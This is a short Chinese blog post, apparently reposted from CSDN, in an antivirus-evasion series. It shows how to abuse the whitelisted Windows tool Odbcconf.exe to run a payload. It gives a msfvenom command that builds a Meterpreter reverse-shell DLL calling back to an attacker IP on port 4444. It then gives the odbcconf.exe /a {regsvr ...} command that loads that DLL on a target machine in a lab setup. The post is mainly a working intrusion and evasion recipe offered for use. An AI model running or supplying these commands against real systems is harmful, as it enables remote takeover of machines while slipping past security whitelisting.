【免杀篇】远控免杀专题(59)-白名单Odbcconf.exe执行payload


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

0x01 Odbcconf.exe介绍

0x02 利用Odbcconf.exe执行payload法


0x01 Odbcconf.exe介绍

Odbcconf.exe是一个命令行工具,可让您配置ODBC驱动程序和数据源名称(微软官方文档https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver15)。

Odbcconf.exe在windows中的的一般路径为C:\Windows\System32\odbcconf.exe  C:\Windows\SysWOW64\odbcconf.exe

通过文档可发现有两种方式来加载dll,/A和/F

扫描二维码关注公众号,回复: 11287957 查看本文章

0x02 利用Odbcconf.exe执行payload法

攻击机:kali    ip地址:192.168.10.130

靶机:win7     ip地址:192.168.10.135

使用msfvenom生成shellcode,注意生成的是dll格式

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f dll > hacker.dll

设置监听:

靶机运行payload:

odbcconf.exe /a {regsvr C:\Users\Administrator\Desktop\hacker.dll}

成功上线:

这个也被杀软盯上了,行为检测预警。

参考链接:

基于白名单Odbcconf执行payload:https://micro8.github.io/Micro8-HTML/Chapter1/81-90/82_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95Odbcconf%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E5%8D%81%E4%BA%8C%E5%AD%A3.html


虽然我们生活在阴沟里,但依然有人仰望星空!


猜你喜欢

转载自blog.csdn.net/God_XiangYu/article/details/106113361